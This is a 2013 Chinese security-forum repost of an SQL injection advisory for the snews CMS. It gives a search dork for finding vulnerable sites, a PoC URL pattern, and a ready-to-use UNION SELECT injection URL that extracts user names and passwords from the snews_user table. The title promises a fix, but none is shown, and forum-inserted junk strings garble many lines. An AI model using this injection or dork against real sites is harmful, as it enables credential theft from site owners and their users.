找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2009|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability
( r* h% s, E1 z$ }' c  D5 I  l作者: By onestree7 w& T  d+ h/ A. ^2 v
下载地址 : http://snewscms.com/
+ X) y- |- q; |3 q. F8 o测试平台 : ubuntu 12.10 / win 7
0 B$ k  X, D' w关键词: inurl:"tanyakan pada rumput yang bergoyang"6 d+ \8 {7 c) q8 z) |0 N0 K" n- b
* a, [: w  o9 W" ^: s8 q
1 ^+ W+ b4 @2 |+ u/ q! k
*************************************************************
! s4 m8 C& Y9 B, O' d
, f( ]$ a' R& R: a% r4 XSQL poc:2 C/ M9 u7 g! m' C

* k! F6 X2 [# R9 L0 B" Hhttp://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]8 r. G. s8 H& Z$ o

( S: o- v9 a" ~/ t示例
' L* l8 c& d6 P
+ J8 e( L6 q% r2 j6 q; Khttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*& W9 _/ ~, O& G. k- x  i

: N" N+ B+ r2 m4 J% v7 ~
5 A3 K( ?1 S& K- U致谢:
5 \8 k" c! U5 f1 f( k9 v
: i# j% x7 B' A9 N8 c# v  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell; A1 k$ r3 p+ i6 k0 u) p
     
+ u; @, D  J3 G- p+ i( a. B- S6 w          indonesiancoder - moeslimh4x0r - go-coder
- @- S0 s- Y# A# r; P
/ G! n/ t- V9 @% g6 @spesial my hunny :*
7 j: ]* y; W8 F1 B* `
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表